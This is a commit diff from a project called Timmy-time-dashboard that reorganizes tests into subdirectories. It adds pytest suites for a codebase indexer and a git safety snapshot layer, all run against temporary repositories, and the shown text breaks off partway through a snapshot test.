forked from Rockachopa/Timmy-time-dashboard
refactor: Phase 3 — reorganize tests into module-mirroring subdirectories
Move 97 test files from flat tests/ into 13 subdirectories: tests/dashboard/ (8 files — routes, mobile, mission control) tests/swarm/ (17 files — coordinator, docker, routing, tasks) tests/timmy/ (12 files — agent, backends, CLI, tools) tests/self_coding/ (14 files — git safety, indexer, self-modify) tests/lightning/ (3 files — L402, LND, interface) tests/creative/ (8 files — assembler, director, image/music/video) tests/integrations/ (10 files — chat bridge, telegram, voice, websocket) tests/mcp/ (4 files — bootstrap, discovery, executor) tests/spark/ (3 files — engine, tools, events) tests/hands/ (3 files — registry, oracle, phase5) tests/scripture/ (1 file) tests/infrastructure/ (3 files — router cascade, API) tests/security/ (3 files — XSS, regression) Fix Path(__file__) reference in test_mobile_scenarios.py for new depth. Add __init__.py to all test subdirectories. Tests: 1503 passed, 9 failed (pre-existing), 53 errors (pre-existing) https://claude.ai/code/session_019oMFNvD8uSGSSmBMGkBfQN
This commit is contained in:
0
tests/self_coding/__init__.py
Normal file
0
tests/self_coding/__init__.py
Normal file
352
tests/self_coding/test_codebase_indexer.py
Normal file
352
tests/self_coding/test_codebase_indexer.py
Normal file
@@ -0,0 +1,352 @@
|
||||
"""Tests for Codebase Indexer.
|
||||
|
||||
Uses temporary directories with Python files to test AST parsing and indexing.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from self_coding.codebase_indexer import CodebaseIndexer, ModuleInfo
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def temp_repo():
|
||||
"""Create a temporary repository with Python files."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
|
||||
# Create src directory structure
|
||||
src_path = repo_path / "src" / "myproject"
|
||||
src_path.mkdir(parents=True)
|
||||
|
||||
# Create a module with classes and functions
|
||||
(src_path / "utils.py").write_text('''
|
||||
"""Utility functions for the project."""
|
||||
|
||||
import os
|
||||
from typing import Optional
|
||||
|
||||
|
||||
class Helper:
|
||||
"""A helper class for common operations."""
|
||||
|
||||
def __init__(self, name: str):
|
||||
self.name = name
|
||||
|
||||
async def process(self, data: str) -> str:
|
||||
"""Process the input data."""
|
||||
return data.upper()
|
||||
|
||||
def cleanup(self):
|
||||
"""Clean up resources."""
|
||||
pass
|
||||
|
||||
|
||||
def calculate_something(x: int, y: int) -> int:
|
||||
"""Calculate something from x and y."""
|
||||
return x + y
|
||||
|
||||
|
||||
def untested_function():
|
||||
pass
|
||||
''')
|
||||
|
||||
# Create another module that imports from utils
|
||||
(src_path / "main.py").write_text('''
|
||||
"""Main application module."""
|
||||
|
||||
from myproject.utils import Helper, calculate_something
|
||||
import os
|
||||
|
||||
|
||||
class Application:
|
||||
"""Main application class."""
|
||||
|
||||
def run(self):
|
||||
helper = Helper("test")
|
||||
result = calculate_something(1, 2)
|
||||
return result
|
||||
''')
|
||||
|
||||
# Create tests
|
||||
tests_path = repo_path / "tests"
|
||||
tests_path.mkdir()
|
||||
|
||||
(tests_path / "test_utils.py").write_text('''
|
||||
"""Tests for utils module."""
|
||||
|
||||
import pytest
|
||||
from myproject.utils import Helper, calculate_something
|
||||
|
||||
|
||||
def test_helper_process():
|
||||
helper = Helper("test")
|
||||
assert helper.process("hello") == "HELLO"
|
||||
|
||||
|
||||
def test_calculate_something():
|
||||
assert calculate_something(2, 3) == 5
|
||||
''')
|
||||
|
||||
yield repo_path
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def indexer(temp_repo):
|
||||
"""Create CodebaseIndexer for temp repo."""
|
||||
import uuid
|
||||
return CodebaseIndexer(
|
||||
repo_path=temp_repo,
|
||||
db_path=temp_repo / f"test_index_{uuid.uuid4().hex[:8]}.db",
|
||||
src_dirs=["src", "tests"],
|
||||
)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerBasics:
|
||||
"""Basic indexing functionality."""
|
||||
|
||||
async def test_index_all_counts(self, indexer):
|
||||
"""Should index all Python files."""
|
||||
stats = await indexer.index_all()
|
||||
|
||||
assert stats["indexed"] == 3 # utils.py, main.py, test_utils.py
|
||||
assert stats["failed"] == 0
|
||||
|
||||
async def test_index_skips_unchanged(self, indexer):
|
||||
"""Should skip unchanged files on second run."""
|
||||
await indexer.index_all()
|
||||
|
||||
# Second index should skip all
|
||||
stats = await indexer.index_all()
|
||||
assert stats["skipped"] == 3
|
||||
assert stats["indexed"] == 0
|
||||
|
||||
async def test_index_changed_detects_updates(self, indexer, temp_repo):
|
||||
"""Should reindex changed files."""
|
||||
await indexer.index_all()
|
||||
|
||||
# Modify a file
|
||||
utils_path = temp_repo / "src" / "myproject" / "utils.py"
|
||||
content = utils_path.read_text()
|
||||
utils_path.write_text(content + "\n# Modified\n")
|
||||
|
||||
# Incremental index should detect change
|
||||
stats = await indexer.index_changed()
|
||||
assert stats["indexed"] == 1
|
||||
assert stats["skipped"] == 2
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerParsing:
|
||||
"""AST parsing accuracy."""
|
||||
|
||||
async def test_parses_classes(self, indexer):
|
||||
"""Should extract class information."""
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/myproject/utils.py")
|
||||
assert info is not None
|
||||
|
||||
class_names = [c.name for c in info.classes]
|
||||
assert "Helper" in class_names
|
||||
|
||||
async def test_parses_class_methods(self, indexer):
|
||||
"""Should extract class methods."""
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/myproject/utils.py")
|
||||
helper = [c for c in info.classes if c.name == "Helper"][0]
|
||||
|
||||
method_names = [m.name for m in helper.methods]
|
||||
assert "process" in method_names
|
||||
assert "cleanup" in method_names
|
||||
|
||||
async def test_parses_function_signatures(self, indexer):
|
||||
"""Should extract function signatures."""
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/myproject/utils.py")
|
||||
|
||||
func_names = [f.name for f in info.functions]
|
||||
assert "calculate_something" in func_names
|
||||
assert "untested_function" in func_names
|
||||
|
||||
# Check signature details
|
||||
calc_func = [f for f in info.functions if f.name == "calculate_something"][0]
|
||||
assert calc_func.returns == "int"
|
||||
assert "x" in calc_func.args[0] if calc_func.args else True
|
||||
|
||||
async def test_parses_imports(self, indexer):
|
||||
"""Should extract import statements."""
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/myproject/main.py")
|
||||
|
||||
assert "myproject.utils.Helper" in info.imports
|
||||
assert "myproject.utils.calculate_something" in info.imports
|
||||
assert "os" in info.imports
|
||||
|
||||
async def test_parses_docstrings(self, indexer):
|
||||
"""Should extract module and class docstrings."""
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/myproject/utils.py")
|
||||
|
||||
assert "Utility functions" in info.docstring
|
||||
assert "helper class" in info.classes[0].docstring.lower()
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerTestCoverage:
|
||||
"""Test coverage mapping."""
|
||||
|
||||
async def test_maps_test_files(self, indexer):
|
||||
"""Should map source files to test files."""
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/myproject/utils.py")
|
||||
|
||||
assert info.test_coverage is not None
|
||||
assert "test_utils.py" in info.test_coverage
|
||||
|
||||
async def test_has_test_coverage_method(self, indexer):
|
||||
"""Should check if file has test coverage."""
|
||||
await indexer.index_all()
|
||||
|
||||
assert await indexer.has_test_coverage("src/myproject/utils.py") is True
|
||||
# main.py has no corresponding test file
|
||||
assert await indexer.has_test_coverage("src/myproject/main.py") is False
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerDependencies:
|
||||
"""Dependency graph building."""
|
||||
|
||||
async def test_builds_dependency_graph(self, indexer):
|
||||
"""Should build import dependency graph."""
|
||||
await indexer.index_all()
|
||||
|
||||
# main.py imports from utils.py
|
||||
deps = await indexer.get_dependency_chain("src/myproject/utils.py")
|
||||
|
||||
assert "src/myproject/main.py" in deps
|
||||
|
||||
async def test_empty_dependency_chain(self, indexer):
|
||||
"""Should return empty list for files with no dependents."""
|
||||
await indexer.index_all()
|
||||
|
||||
# test_utils.py likely doesn't have dependents
|
||||
deps = await indexer.get_dependency_chain("tests/test_utils.py")
|
||||
|
||||
assert deps == []
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerSummary:
|
||||
"""Summary generation."""
|
||||
|
||||
async def test_generates_summary(self, indexer):
|
||||
"""Should generate codebase summary."""
|
||||
await indexer.index_all()
|
||||
|
||||
summary = await indexer.get_summary()
|
||||
|
||||
assert "Codebase Summary" in summary
|
||||
assert "myproject.utils" in summary
|
||||
assert "Helper" in summary
|
||||
assert "calculate_something" in summary
|
||||
|
||||
async def test_summary_respects_max_tokens(self, indexer):
|
||||
"""Should truncate if summary exceeds max tokens."""
|
||||
await indexer.index_all()
|
||||
|
||||
# Very small limit
|
||||
summary = await indexer.get_summary(max_tokens=10)
|
||||
|
||||
assert len(summary) <= 10 * 4 + 100 # rough check with buffer
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerRelevance:
|
||||
"""Relevant file search."""
|
||||
|
||||
async def test_finds_relevant_files(self, indexer):
|
||||
"""Should find files relevant to task description."""
|
||||
await indexer.index_all()
|
||||
|
||||
files = await indexer.get_relevant_files("calculate something with helper", limit=5)
|
||||
|
||||
assert "src/myproject/utils.py" in files
|
||||
|
||||
async def test_relevance_scoring(self, indexer):
|
||||
"""Should score files by keyword match."""
|
||||
await indexer.index_all()
|
||||
|
||||
files = await indexer.get_relevant_files("process data with helper", limit=5)
|
||||
|
||||
# utils.py should be first (has Helper class with process method)
|
||||
assert files[0] == "src/myproject/utils.py"
|
||||
|
||||
async def test_returns_empty_for_no_matches(self, indexer):
|
||||
"""Should return empty list when no files match."""
|
||||
await indexer.index_all()
|
||||
|
||||
# Use truly unique keywords that won't match anything in the codebase
|
||||
files = await indexer.get_relevant_files("astronaut dinosaur zebra unicorn", limit=5)
|
||||
|
||||
assert files == []
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerIntegration:
|
||||
"""Full workflow integration tests."""
|
||||
|
||||
async def test_full_index_query_workflow(self, temp_repo):
|
||||
"""Complete workflow: index, query, get dependencies."""
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=temp_repo,
|
||||
db_path=temp_repo / "integration.db",
|
||||
src_dirs=["src", "tests"],
|
||||
)
|
||||
|
||||
# Index all files
|
||||
stats = await indexer.index_all()
|
||||
assert stats["indexed"] == 3
|
||||
|
||||
# Get summary
|
||||
summary = await indexer.get_summary()
|
||||
assert "Helper" in summary
|
||||
|
||||
# Find relevant files
|
||||
files = await indexer.get_relevant_files("helper class", limit=3)
|
||||
assert len(files) > 0
|
||||
|
||||
# Check dependencies
|
||||
deps = await indexer.get_dependency_chain("src/myproject/utils.py")
|
||||
assert "src/myproject/main.py" in deps
|
||||
|
||||
# Verify test coverage
|
||||
has_tests = await indexer.has_test_coverage("src/myproject/utils.py")
|
||||
assert has_tests is True
|
||||
|
||||
async def test_handles_syntax_errors_gracefully(self, temp_repo):
|
||||
"""Should skip files with syntax errors."""
|
||||
# Create a file with syntax error
|
||||
(temp_repo / "src" / "bad.py").write_text("def broken(:")
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=temp_repo,
|
||||
db_path=temp_repo / "syntax_error.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
# Should index the good files, fail on bad one
|
||||
assert stats["failed"] == 1
|
||||
assert stats["indexed"] >= 2
|
||||
441
tests/self_coding/test_codebase_indexer_errors.py
Normal file
441
tests/self_coding/test_codebase_indexer_errors.py
Normal file
@@ -0,0 +1,441 @@
|
||||
"""Error path tests for Codebase Indexer.
|
||||
|
||||
Tests syntax errors, encoding issues, circular imports, and edge cases.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from self_coding.codebase_indexer import CodebaseIndexer, ModuleInfo
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestCodebaseIndexerErrors:
|
||||
"""Indexing error handling."""
|
||||
|
||||
async def test_syntax_error_file(self):
|
||||
"""Should skip files with syntax errors."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# Valid file
|
||||
(src_path / "good.py").write_text("def good(): pass")
|
||||
|
||||
# File with syntax error
|
||||
(src_path / "bad.py").write_text("def bad(:\n pass")
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
assert stats["indexed"] == 1
|
||||
assert stats["failed"] == 1
|
||||
|
||||
async def test_unicode_in_source(self):
|
||||
"""Should handle Unicode in source files."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# File with Unicode
|
||||
(src_path / "unicode.py").write_text(
|
||||
'# -*- coding: utf-8 -*-\n'
|
||||
'"""Module with Unicode: ñ 中文 🎉"""\n'
|
||||
'def hello():\n'
|
||||
' """Returns 👋"""\n'
|
||||
' return "hello"\n',
|
||||
encoding="utf-8",
|
||||
)
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
assert stats["indexed"] == 1
|
||||
assert stats["failed"] == 0
|
||||
|
||||
info = await indexer.get_module_info("src/unicode.py")
|
||||
assert "中文" in info.docstring
|
||||
|
||||
async def test_empty_file(self):
|
||||
"""Should handle empty Python files."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# Empty file
|
||||
(src_path / "empty.py").write_text("")
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
assert stats["indexed"] == 1
|
||||
|
||||
info = await indexer.get_module_info("src/empty.py")
|
||||
assert info is not None
|
||||
assert info.functions == []
|
||||
assert info.classes == []
|
||||
|
||||
async def test_large_file(self):
|
||||
"""Should handle large Python files."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# Large file with many functions
|
||||
content = ['"""Large module."""']
|
||||
for i in range(100):
|
||||
content.append(f'def function_{i}(x: int) -> int:')
|
||||
content.append(f' """Function {i}."""')
|
||||
content.append(f' return x + {i}')
|
||||
content.append('')
|
||||
|
||||
(src_path / "large.py").write_text("\n".join(content))
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
assert stats["indexed"] == 1
|
||||
|
||||
info = await indexer.get_module_info("src/large.py")
|
||||
assert len(info.functions) == 100
|
||||
|
||||
async def test_nested_classes(self):
|
||||
"""Should handle nested classes."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
(src_path / "nested.py").write_text('''
|
||||
"""Module with nested classes."""
|
||||
|
||||
class Outer:
|
||||
"""Outer class."""
|
||||
|
||||
class Inner:
|
||||
"""Inner class."""
|
||||
|
||||
def inner_method(self):
|
||||
pass
|
||||
|
||||
def outer_method(self):
|
||||
pass
|
||||
''')
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/nested.py")
|
||||
|
||||
# Should find Outer class (top-level)
|
||||
assert len(info.classes) == 1
|
||||
assert info.classes[0].name == "Outer"
|
||||
# Outer should have outer_method
|
||||
assert len(info.classes[0].methods) == 1
|
||||
assert info.classes[0].methods[0].name == "outer_method"
|
||||
|
||||
async def test_complex_type_annotations(self):
|
||||
"""Should handle complex type annotations."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
(src_path / "types.py").write_text('''
|
||||
"""Module with complex types."""
|
||||
|
||||
from typing import Dict, List, Optional, Union, Callable
|
||||
|
||||
|
||||
def complex_function(
|
||||
items: List[Dict[str, Union[int, str]]],
|
||||
callback: Callable[[int], bool],
|
||||
optional: Optional[str] = None,
|
||||
) -> Dict[str, List[int]]:
|
||||
"""Function with complex types."""
|
||||
return {}
|
||||
|
||||
|
||||
class TypedClass:
|
||||
"""Class with type annotations."""
|
||||
|
||||
def method(self, x: int | str) -> list[int]:
|
||||
"""Method with union type (Python 3.10+)."""
|
||||
return []
|
||||
''')
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/types.py")
|
||||
|
||||
# Should parse without error
|
||||
assert len(info.functions) == 1
|
||||
assert len(info.classes) == 1
|
||||
|
||||
async def test_import_variations(self):
|
||||
"""Should handle various import styles."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
(src_path / "imports.py").write_text('''
|
||||
"""Module with various imports."""
|
||||
|
||||
# Regular imports
|
||||
import os
|
||||
import sys as system
|
||||
from pathlib import Path
|
||||
|
||||
# From imports
|
||||
from typing import Dict, List
|
||||
from collections import OrderedDict as OD
|
||||
|
||||
# Relative imports (may not resolve)
|
||||
from . import sibling
|
||||
from .subpackage import module
|
||||
|
||||
# Dynamic imports (won't be caught by AST)
|
||||
try:
|
||||
import optional_dep
|
||||
except ImportError:
|
||||
pass
|
||||
''')
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
info = await indexer.get_module_info("src/imports.py")
|
||||
|
||||
# Should capture static imports
|
||||
assert "os" in info.imports
|
||||
assert "typing.Dict" in info.imports or "Dict" in str(info.imports)
|
||||
|
||||
async def test_no_src_directory(self):
|
||||
"""Should handle missing src directory gracefully."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src", "tests"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
assert stats["indexed"] == 0
|
||||
assert stats["failed"] == 0
|
||||
|
||||
async def test_permission_error(self):
|
||||
"""Should handle permission errors gracefully."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# Create file
|
||||
file_path = src_path / "locked.py"
|
||||
file_path.write_text("def test(): pass")
|
||||
|
||||
# Remove read permission (if on Unix)
|
||||
import os
|
||||
try:
|
||||
os.chmod(file_path, 0o000)
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
# Should count as failed
|
||||
assert stats["failed"] == 1
|
||||
|
||||
finally:
|
||||
# Restore permission for cleanup
|
||||
os.chmod(file_path, 0o644)
|
||||
|
||||
async def test_circular_imports_in_dependency_graph(self):
|
||||
"""Should handle circular imports in dependency analysis."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# Create circular imports
|
||||
(src_path / "a.py").write_text('''
|
||||
"""Module A."""
|
||||
from b import B
|
||||
|
||||
class A:
|
||||
def get_b(self):
|
||||
return B()
|
||||
''')
|
||||
|
||||
(src_path / "b.py").write_text('''
|
||||
"""Module B."""
|
||||
from a import A
|
||||
|
||||
class B:
|
||||
def get_a(self):
|
||||
return A()
|
||||
''')
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
# Both should have each other as dependencies
|
||||
a_deps = await indexer.get_dependency_chain("src/a.py")
|
||||
b_deps = await indexer.get_dependency_chain("src/b.py")
|
||||
|
||||
# Note: Due to import resolution, this might not be perfect
|
||||
# but it shouldn't crash
|
||||
assert isinstance(a_deps, list)
|
||||
assert isinstance(b_deps, list)
|
||||
|
||||
async def test_summary_with_no_modules(self):
|
||||
"""Summary should handle empty codebase."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
summary = await indexer.get_summary()
|
||||
|
||||
assert "Codebase Summary" in summary
|
||||
assert "Total modules: 0" in summary
|
||||
|
||||
async def test_get_relevant_files_with_special_chars(self):
|
||||
"""Should handle special characters in search query."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
(src_path / "test.py").write_text('def test(): pass')
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
await indexer.index_all()
|
||||
|
||||
# Search with special chars shouldn't crash
|
||||
files = await indexer.get_relevant_files("test!@#$%^&*()", limit=5)
|
||||
assert isinstance(files, list)
|
||||
|
||||
async def test_concurrent_indexing(self):
|
||||
"""Should handle concurrent indexing attempts."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
(src_path / "file.py").write_text("def test(): pass")
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
# Multiple rapid indexing calls
|
||||
import asyncio
|
||||
tasks = [
|
||||
indexer.index_all(),
|
||||
indexer.index_all(),
|
||||
indexer.index_all(),
|
||||
]
|
||||
results = await asyncio.gather(*tasks)
|
||||
|
||||
# All should complete without error
|
||||
for stats in results:
|
||||
assert stats["indexed"] >= 0
|
||||
assert stats["failed"] >= 0
|
||||
|
||||
async def test_binary_file_in_src(self):
|
||||
"""Should skip binary files in src directory."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
src_path = repo_path / "src"
|
||||
src_path.mkdir()
|
||||
|
||||
# Binary file
|
||||
(src_path / "data.bin").write_bytes(b"\x00\x01\x02\x03")
|
||||
|
||||
# Python file
|
||||
(src_path / "script.py").write_text("def test(): pass")
|
||||
|
||||
indexer = CodebaseIndexer(
|
||||
repo_path=repo_path,
|
||||
db_path=repo_path / "index.db",
|
||||
src_dirs=["src"],
|
||||
)
|
||||
|
||||
stats = await indexer.index_all()
|
||||
|
||||
# Should only index .py file
|
||||
assert stats["indexed"] == 1
|
||||
assert stats["failed"] == 0 # Binary files are skipped, not failed
|
||||
428
tests/self_coding/test_git_safety.py
Normal file
428
tests/self_coding/test_git_safety.py
Normal file
@@ -0,0 +1,428 @@
|
||||
"""Tests for Git Safety Layer.
|
||||
|
||||
Uses temporary git repositories to test snapshot/rollback/merge workflows
|
||||
without affecting the actual Timmy repository.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import asyncio
|
||||
import os
|
||||
import subprocess
|
||||
import tempfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from self_coding.git_safety import (
|
||||
GitSafety,
|
||||
GitDirtyWorkingDirectoryError,
|
||||
GitNotRepositoryError,
|
||||
GitOperationError,
|
||||
Snapshot,
|
||||
)
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def temp_git_repo():
|
||||
"""Create a temporary git repository for testing."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
repo_path = Path(tmpdir)
|
||||
|
||||
# Initialize git repo
|
||||
subprocess.run(["git", "init"], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(
|
||||
["git", "config", "user.email", "test@test.com"],
|
||||
cwd=repo_path,
|
||||
check=True,
|
||||
capture_output=True,
|
||||
)
|
||||
subprocess.run(
|
||||
["git", "config", "user.name", "Test User"],
|
||||
cwd=repo_path,
|
||||
check=True,
|
||||
capture_output=True,
|
||||
)
|
||||
|
||||
# Create initial file and commit
|
||||
(repo_path / "README.md").write_text("# Test Repo")
|
||||
subprocess.run(["git", "add", "."], cwd=repo_path, check=True, capture_output=True)
|
||||
subprocess.run(
|
||||
["git", "commit", "-m", "Initial commit"],
|
||||
cwd=repo_path,
|
||||
check=True,
|
||||
capture_output=True,
|
||||
)
|
||||
|
||||
# Rename master to main if needed
|
||||
result = subprocess.run(
|
||||
["git", "branch", "-M", "main"],
|
||||
cwd=repo_path,
|
||||
capture_output=True,
|
||||
)
|
||||
|
||||
yield repo_path
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def git_safety(temp_git_repo):
|
||||
"""Create GitSafety instance for temp repo."""
|
||||
safety = GitSafety(
|
||||
repo_path=temp_git_repo,
|
||||
main_branch="main",
|
||||
test_command="echo 'No tests configured'", # Fake test command
|
||||
)
|
||||
return safety
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetyBasics:
|
||||
"""Basic git operations."""
|
||||
|
||||
async def test_init_with_valid_repo(self, temp_git_repo):
|
||||
"""Should initialize successfully with valid git repo."""
|
||||
safety = GitSafety(repo_path=temp_git_repo)
|
||||
assert safety.repo_path == temp_git_repo.resolve()
|
||||
assert safety.main_branch == "main"
|
||||
|
||||
async def test_init_with_invalid_repo(self):
|
||||
"""Should raise GitNotRepositoryError for non-repo path."""
|
||||
with tempfile.TemporaryDirectory() as tmpdir:
|
||||
with pytest.raises(GitNotRepositoryError):
|
||||
GitSafety(repo_path=tmpdir)
|
||||
|
||||
async def test_is_clean_clean_repo(self, git_safety, temp_git_repo):
|
||||
"""Should return True for clean repo."""
|
||||
safety = git_safety
|
||||
assert await safety.is_clean() is True
|
||||
|
||||
async def test_is_clean_dirty_repo(self, git_safety, temp_git_repo):
|
||||
"""Should return False when there are uncommitted changes."""
|
||||
safety = git_safety
|
||||
# Create uncommitted file
|
||||
(temp_git_repo / "dirty.txt").write_text("dirty")
|
||||
assert await safety.is_clean() is False
|
||||
|
||||
async def test_get_current_branch(self, git_safety):
|
||||
"""Should return current branch name."""
|
||||
safety = git_safety
|
||||
branch = await safety.get_current_branch()
|
||||
assert branch == "main"
|
||||
|
||||
async def test_get_current_commit(self, git_safety):
|
||||
"""Should return valid commit hash."""
|
||||
safety = git_safety
|
||||
commit = await safety.get_current_commit()
|
||||
assert len(commit) == 40 # Full SHA-1 hash
|
||||
assert all(c in "0123456789abcdef" for c in commit)
|
||||
|
||||
|
||||
@pytest.mark.asyncio
|
||||
class TestGitSafetySnapshot:
|
||||
"""Snapshot functionality."""
|
||||
|
||||
async def test_snapshot_returns_snapshot_object(self, git_safety):
|
||||
"""Should return Snapshot with all fields populated."""
|
||||
safety = git_safety
|
||||
snapshot = await safety.snapshot(run_tests=False)
|
||||
|
||||
assert isinstance(snapshot, Snapshot)
|
||||
assert len(snapshot.commit_hash) == 40
|
||||
assert snapshot.branch == "main"
|
||||
assert snapshot.timestamp is not None
|
||||
assert snapshot.clean is True
|
||||
|
||||
async def test_snapshot_captures_clean_status(self, git_safety, temp_git_repo):
|
||||
"""Should correctly capture clean/dirty status."""
|
||||
safety = git_safety
|
||||
|
||||
# Clean snapshot
|
||||
clean_snapshot = await safety.snapshot(run_tests=False)
|
||||
assert clean_snapshot.clean is True
|
||||
|
||||
# Dirty snapshot
|
||||
(temp_git_repo / "dirty.txt").write_text("dirty")
|
||||
dirty_snapshot = await safety.snapshot(run_tests=False)
|
||||
